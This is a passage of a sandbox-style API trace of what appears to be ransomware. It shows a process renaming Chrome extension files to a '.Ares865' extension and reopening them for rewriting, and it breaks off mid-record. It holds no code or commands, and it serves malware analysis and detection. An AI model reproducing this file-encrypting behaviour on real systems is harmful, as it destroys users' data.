data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.ares865"), dwFlags=0x1) returned 1 [0100.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.189] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=175595) returned 1 [0100.209] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.Ares865") returned 165 [0100.209] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.ares865"), dwFlags=0x1) returned 1 [0100.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.211] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=496847) returned 1 [0100.240] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.Ares865") returned 163 [0100.240] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.ares865"), dwFlags=0x1) returned 1 [0100.242] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.242] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2369) returned 1 [0100.245] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata" [0100.246] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.Ares865") returned 174 [0100.246] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.ares865"), dwFlags=0x1) returned 1 [0100.247] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.248] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29337) returned 1 [0100.251] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.Ares865") returned 176 [0100.252] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.ares865"), dwFlags=0x1) returned 1 [0100.253] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.253] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15929) returned 1 [0100.259] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales" [0100.260] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW" [0100.260] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.Ares865") returned 172 [0100.260] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.261] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.262] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15730) returned 1 [0100.268] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh" [0100.269] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.Ares865") returned 169 [0100.269] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.270] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15633) returned 1 [0100.274] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi" [0100.274] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.Ares865") returned 169 [0100.274] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.281] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17003) returned 1 [0100.285] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk" [0100.286] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.Ares865") returned 169 [0100.286] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.292] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18673) returned 1 [0100.301] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr" [0100.301] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.Ares865") returned 169 [0100.301] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.302] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.303] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16462) returned 1 [0100.309] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th" [0100.309] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.Ares865") returned 169 [0100.309] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.311] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20324) returned 1 [0100.315] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 